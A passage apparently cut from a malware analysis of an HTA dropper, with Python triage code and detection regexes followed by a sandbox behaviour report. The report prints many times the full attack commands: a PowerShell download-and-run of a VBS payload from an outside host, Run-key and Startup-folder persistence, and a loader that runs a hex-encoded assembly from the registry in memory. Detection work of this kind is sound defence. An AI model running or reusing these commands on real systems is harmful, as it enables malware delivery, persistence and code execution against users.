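    header = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0"
    return header.hex().upper().replace("0", "@")


# --- 2. Flag the PowerShell/wscript command-line traits from the report ----
LOADER_INDICATORS = [
    (r"-ExecutionPolicy\s+Bypass",    "execution policy bypass"),
    (r"-windowstyle\s+hidden",        "hidden window"),
    (r"GetDomain\(\)\.Load\(",        "in-memory assembly load"),
    (r"EntryPoint\.invoke\(",         "assembly entry point invoked"),
    (r"CurrentVersion\\Run",          "Run key persistence"),
    (r"GetFolderPath\(7\)",           "Startup folder persistence (CSIDL 7)"),
    (r"\.DownloadFile\(",             "remote download"),
    (r"wscript(\.exe)?['\"]?\s+//B",  "wscript batch mode (errors suppressed)"),
]


def triage_command_line(cmd: str) -> list:
    """Return the indicator labels that match, in LOADER_INDICATORS order."""
    return [label for pat, label in LOADER_INDICATORS
            if re.search(pat, cmd, re.IGNORECASE)]


# Constructed sample command lines, shortened from the ones in the report.
SAMPLE_CMDLINES = {
    "stage1": r"""cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'""",
    "runkey": r"""powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;""",
    "startup": r"""powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))""",
    "loader": r"""powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command $_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);""",
    "wscript": r"""wscript.exe //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'""",
    "benign": r"""powershell.exe -Command Get-Process | Sort-Object CPU""",
}


if __name__ == "__main__":
    blob = make_fake_blob()
    print("decoded PE header:", pe_header_info(decode_registry_blob(blob)))
    for name, cmd in SAMPLE_CMDLINES.items():
        print(f"{name:8s} -> {triage_command_line(cmd)}")
```

On a live host the same decode can be applied to the value exported from `HKCU\SOFTWARE\Microsoft` (`reg export` it rather than reading it from inside the infected user's PowerShell session), and a hit on either of the two in-memory indicators together with a Run key or Startup folder write is a much stronger signal than any one of them alone, since `-ExecutionPolicy Bypass -windowstyle hidden` is common in legitimate admin scripts too.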
Creates mutexes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\RV_MUTEX
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 2 times)
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Classification label
Source: classification engine | Classification label: mal100.troj.evad.winHTA@49/18@2/3
Creates files inside the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
Creates temporary files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\microsoft.vbs
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'
Found command line output
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: 69 UTF-16 console buffer fragments, mostly non-printable. The readable text recovered from them:
  PS C:\Users\Sam Tarwell\Desktop>   (the PowerShell prompt; the sandbox profile name "Sam Tarwell" matches the SAMTAR~1 short path in the command lines)
  PSChildName : Run
  PSDrive     : HKCU   (consistent with New-ItemProperty echoing the value it wrote under HKCU\...\CurrentVersion\Run)
  ...eing used by another process."   (a file-in-use error)
  At line:1 char:110
  ...crosoft.vbs'))   (tail of the WriteAllText(..., ReadAllText('...microsoft.vbs')) command that raised it)
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
(The same three modules are reported 11 times; repeats collapsed.)
Reads ini files
Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: microsoft.hta | virustotal: Detection: 10%
Spawns processes
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\Desktop\microsoft.hta'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe | Process created: unknown unknown
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Reads internet explorer settings
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Uses new MSVCR Dlls
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
Binary contains paths to debug symbols
Source: Binary string: iexplore.pdb UGP | source: mshta.exe, 00000001.00000003.1823878968.02A7E000.00000004.sdmp
Source: Binary string: scrrun.pdb | source: wscript.exe, 00000006.00000002.2059560819.006A0000.00000002.sdmp
Source: Binary string: iexplore.pdb UGP | source: mshta.exe, 00000001.00000003.1620046534.001D3000.00000004.sdmp, microsoft.hta
Source: Binary string: wscript.pdb | source: wscript.exe, 00000006.00000002.2058746695.002B0000.00000002.sdmp
Source: Binary string: wscript.pdbN | source: wscript.exe, 00000006.00000002.2058746695.002B0000.00000002.sdmp
Source: Binary string: mscorrc.pdb | source: powershell.exe, 00000004.00000002.1650297060.018E0000.00000002.sdmp, powershell.exe, 00000007.00000002.2065449016.01C10000.00000002.sdmp

Data Obfuscation:

Powershell starts a process from the temp directory
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
